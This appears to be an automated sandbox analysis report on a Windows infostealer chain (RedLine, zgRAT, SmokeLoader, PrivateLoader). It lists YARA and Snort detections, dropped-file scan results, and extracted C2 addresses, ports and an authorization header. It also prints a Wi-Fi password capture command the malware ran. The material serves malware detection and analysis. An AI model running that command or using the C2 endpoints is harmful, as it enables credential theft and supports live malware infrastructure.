31.2.C4AD.exe.c000368000.6.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.2zx1310.exe.a01000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.3.C4AD.exe.c00035e000.9.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
43.2.D9EC.exe.27d948bd660.12.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
43.2.D9EC.exe.27d948bd660.12.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9d2f2:$s1: file:/// 0x9d202:$s2: {11111-22222-10009-11112} 0x9d282:$s3: {11111-22222-50001-00000} 0x963e8:$s4: get_Module 0x96851:$s5: Reverse 0x9c368:$s6: BlockCopy 0x9ccde:$s7: ReadByte 0x9d304:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
31.3.C4AD.exe.1fec5590000.14.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
24.2.9AED.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
24.2.9AED.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x12c9c:$s5: delete[] 0x12450:$s6: constructor or from DllMain. 0x54ad3:$v2_1: ListOfProcesses 0x54617:$v4_3: base64str 0x567e4:$v4_4: stringKey 0x5037e:$v4_5: BytesToStringConverted 0x4f730:$v4_6: FromBase64 0x50fe6:$v4_8: procName 0x4ff0f:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
44.2.IdentityReference.exe.1af1055e76a.9.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
43.2.D9EC.exe.27d94c209d8.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.3.jtfCFDmLdX.exe.50b2220.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.3.jtfCFDmLdX.exe.50b2220.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 19 88 44 24 2B 88 44 24 2F B0 C2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
43.2.D9EC.exe.27d9483d628.9.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
43.2.D9EC.exe.27d9483d628.9.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x11d32a:$s1: file:/// 0x11d23a:$s2: {11111-22222-10009-11112} 0x11d2ba:$s3: {11111-22222-50001-00000} 0x116420:$s4: get_Module 0x116889:$s5: Reverse 0x11c3a0:$s6: BlockCopy 0x11cd16:$s7: ReadByte 0x11d33c:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
43.2.D9EC.exe.27d948bd660.12.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
43.2.D9EC.exe.27d948bd660.12.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9b4f2:$s1: file:/// 0x9b402:$s2: {11111-22222-10009-11112} 0x9b482:$s3: {11111-22222-50001-00000} 0x945e8:$s4: get_Module 0x94a51:$s5: Reverse 0x9a568:$s6: BlockCopy 0x9aede:$s7: ReadByte 0x9b504:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
9.2.AppLaunch.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
44.2.IdentityReference.exe.1af1065e658.11.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.0.6rR8iy1.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.0.6rR8iy1.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 19 88 44 24 2B 88 44 24 2F B0 C2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
43.2.D9EC.exe.27d949bd698.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
43.2.D9EC.exe.27d949bd698.11.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
43.2.D9EC.exe.27d949bd698.11.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9d2f2:$s1: file:/// 0x9d202:$s2: {11111-22222-10009-11112} 0x9d282:$s3: {11111-22222-50001-00000} 0x963e8:$s4: get_Module 0x96851:$s5: Reverse 0x9c368:$s6: BlockCopy 0x9ccde:$s7: ReadByte 0x9d304:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
31.2.C4AD.exe.c000368000.6.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.2.C4AD.exe.c000574000.7.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
43.2.D9EC.exe.27d9cc00000.16.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
43.2.D9EC.exe.27d9cc00000.16.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9b4f2:$s1: file:/// 0x9b402:$s2: {11111-22222-10009-11112} 0x9b482:$s3: {11111-22222-50001-00000} 0x945e8:$s4: get_Module 0x94a51:$s5: Reverse 0x9a568:$s6: BlockCopy 0x9aede:$s7: ReadByte 0x9b504:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
9.2.AppLaunch.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
43.2.D9EC.exe.27d94b30968.13.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
5.2.AppLaunch.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
43.2.D9EC.exe.27d94b08930.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
43.2.D9EC.exe.27d94b30968.13.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
24.2.9AED.exe.570000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
24.2.9AED.exe.570000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x3f8c3:$v2_1: ListOfProcesses 0x3f407:$v4_3: base64str 0x415d4:$v4_4: stringKey 0x3b16e:$v4_5: BytesToStringConverted 0x3a520:$v4_6: FromBase64 0x3bdd6:$v4_8: procName 0x3acff:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
43.2.D9EC.exe.27d9cc00000.16.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
43.2.D9EC.exe.27d9cc00000.16.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9d2f2:$s1: file:/// 0x9d202:$s2: {11111-22222-10009-11112} 0x9d282:$s3: {11111-22222-50001-00000} 0x963e8:$s4: get_Module 0x96851:$s5: Reverse 0x9c368:$s6: BlockCopy 0x9ccde:$s7: ReadByte 0x9d304:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
12.2.6rR8iy1.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.6rR8iy1.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 19 88 44 24 2B 88 44 24 2F B0 C2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
48.2.jsc.exe.550000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
43.2.D9EC.exe.27d94b08930.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
31.2.C4AD.exe.c0004f8000.9.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.2.C4AD.exe.c0004f8000.9.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.3.C4AD.exe.c000368000.10.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.2.C4AD.exe.c0003a0000.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
42.2.D9EC.exe.1e951c9cbd8.2.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
10.2.5zQ4dC4.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
31.3.C4AD.exe.1fec5540000.17.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.2.C4AD.exe.c000530000.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.2zx1310.exe.a01000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
42.2.D9EC.exe.1e96a7a0000.8.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
44.2.IdentityReference.exe.1af1055e76a.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
43.2.D9EC.exe.27d84460000.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
44.2.IdentityReference.exe.1af1065e658.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
10.0.5zQ4dC4.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
31.2.C4AD.exe.c000530000.8.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.4ZZ099qJ.exe.1031000.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
31.3.C4AD.exe.1fec5590000.14.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
42.2.D9EC.exe.1e96a7a0000.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
31.2.C4AD.exe.c0003a0000.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.2.C4AD.exe.c000574000.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
31.3.C4AD.exe.c000368000.10.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.4ZZ099qJ.exe.1031000.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
43.2.D9EC.exe.27d949bd698.11.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
43.2.D9EC.exe.27d949bd698.11.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9b4f2:$s1: file:/// 0x9b402:$s2: {11111-22222-10009-11112} 0x9b482:$s3: {11111-22222-50001-00000} 0x945e8:$s4: get_Module 0x94a51:$s5: Reverse 0x9a568:$s6: BlockCopy 0x9aede:$s7: ReadByte 0x9b504:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
6.2.4ZZ099qJ.exe.e80000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
3.2.2zx1310.exe.850000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 61 entries

Sigma Signatures

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], CommandLine: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe" , ParentImage: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe, ParentProcessId: 404, ParentProcessName: 8F82.exe, ProcessCommandLine: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], ProcessId: 4864, ProcessName: cmd.exe

Snort Signatures

ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Activity) - Source IP: 192.168.2.4 - Destination IP: 194.49.94.152

Timestamp:	192.168.2.4194.49.94.15249729505002046269 11/18/23-10:02:03.065260
SID:	2046269
Source Port:	49729
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP v.0.x (External IP) - Source IP: 194.49.94.152 - Destination IP: 192.168.2.4

Timestamp:	194.49.94.152192.168.2.450500497292046267 11/18/23-10:01:57.666986
SID:	2046267
Source Port:	50500
Destination Port:	49729
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Token) - Source IP: 194.49.94.152 - Destination IP: 192.168.2.4

Timestamp:	194.49.94.152192.168.2.450500497292046266 11/18/23-10:01:57.356987
SID:	2046266
Source Port:	50500
Destination Port:	49729
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 194.169.175.235

Timestamp:	192.168.2.4194.169.175.23549738426912043231 11/18/23-10:02:36.148848
SID:	2043231
Source Port:	49738
Destination Port:	42691
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 194.49.94.152 - Destination IP: 192.168.2.4

Timestamp:	194.49.94.152192.168.2.419053497302043234 11/18/23-10:01:58.165377
SID:	2043234
Source Port:	19053
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 194.169.175.235 - Destination IP: 192.168.2.4

Timestamp:	194.169.175.235192.168.2.442691497382043234 11/18/23-10:02:27.168741
SID:	2043234
Source Port:	42691
Destination Port:	49738
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) - Source IP: 192.168.2.4 - Destination IP: 194.169.175.235

Timestamp:	192.168.2.4194.169.175.23549738426912046045 11/18/23-10:02:26.869964
SID:	2046045
Source Port:	49738
Destination Port:	42691
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer Activity (Response) - Source IP: 194.169.175.235 - Destination IP: 192.168.2.4

Timestamp:	194.169.175.235192.168.2.442691497382046056 11/18/23-10:02:33.744857
SID:	2046056
Source Port:	42691
Destination Port:	49738
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected RisePro TCP Heartbeat Packet - Source IP: 192.168.2.4 - Destination IP: 194.49.94.152

Timestamp:	192.168.2.4194.49.94.15249729505002049060 11/18/23-10:01:57.474369
SID:	2049060
Source Port:	49729
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 194.49.94.152

Timestamp:	192.168.2.4194.49.94.15249730190532043231 11/18/23-10:02:12.130260
SID:	2043231
Source Port:	49730
Destination Port:	19053
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) - Source IP: 192.168.2.4 - Destination IP: 194.49.94.152

Timestamp:	192.168.2.4194.49.94.15249730190532046045 11/18/23-10:01:57.866628
SID:	2046045
Source Port:	49730
Destination Port:	19053
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://66.42.56.128:80	Avira URL Cloud: Label: malware
Source: http://18.218.18.183:80	Avira URL Cloud: Label: malware
Source: https://central-cee-doja.ru/getwallet.php?id=1444&wallet=ltc	Avira URL Cloud: Label: malware
Source: http://52.86.18.77:8080	Avira URL Cloud: Label: malware
Source: https://central-cee-doja.ru/getwallet.php?id=1444&wallet=eth	Avira URL Cloud: Label: malware
Source: https://central-cee-doja.ru//ready.php?id=4627883	Avira URL Cloud: Label: malware
Source: http://185.217.98.121:80	Avira URL Cloud: Label: malware
Source: https://central-cee-doja.ru/getwallet.php?id=1444&wallet=dash	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\932079.exe	Avira: detection malicious, Label: TR/Spy.Agent.gygru
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	Avira: detection malicious, Label: HEUR/AGEN.1323769
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Avira: detection malicious, Label: HEUR/AGEN.1357339
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Avira: detection malicious, Label: HEUR/AGEN.1307175
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\GtxAoNQLNDxAZTy.data	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\616D.exe	Avira: detection malicious, Label: HEUR/AGEN.1317414
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Avira: detection malicious, Label: HEUR/AGEN.1303617

Found malware configuration

Source: 0000000A.00000002.1747098618.0000000000160000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://194.49.94.210/fks/index.php", "http://194.49.94.210/fks/index.php"]}
Source: 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "194.49.94.80:42359", "Bot Id": "FILE2", "Authorization Header": "82506a2bfe25f76a5450c48bf3a84def"}

Multi AV Scanner detection for submitted file

Source: jtfCFDmLdX.exe	ReversingLabs: Detection: 57%
Source: jtfCFDmLdX.exe	Virustotal: Detection: 72%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: jtfCFDmLdX.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Source: central-cee-doja.ru	Virustotal: Detection: 20%	Perma Link
Source: http://66.42.56.128:80	Virustotal: Detection: 6%	Perma Link
Source: http://52.86.18.77:8080	Virustotal: Detection: 6%	Perma Link
Source: https://central-cee-doja.ru//ready.php?id=4627883	Virustotal: Detection: 16%	Perma Link
Source: http://185.217.98.121:80	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\932079.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\932079.exe	Virustotal: Detection: 79%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\39D.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\616D.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\61F6.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\8427.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\853C.exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\C4AD.exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\latestX.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	ReversingLabs: Detection: 21%

Machine Learning detection for sample

Source: jtfCFDmLdX.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\932079.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\39D.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8F82.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\GtxAoNQLNDxAZTy.data	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\616D.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Code function: 0_2_00FC2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	0_2_00FC2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Code function: 1_2_004C2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	1_2_004C2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Code function: 2_2_00ED2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	2_2_00ED2F1D

Source: tor-real.exe, 0000001D.00000003.2372823979.0000000004290000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_e4f0da49-c

Source: unknown

HTTPS traffic detected: 104.21.35.168:443 -> 192.168.2.4:49793 version: TLS 1.0

Source: jtfCFDmLdX.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.29.134.23:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 164.90.185.9:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.217.98.121:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.227.21.98:443 -> 192.168.2.4:49832 version: TLS 1.2
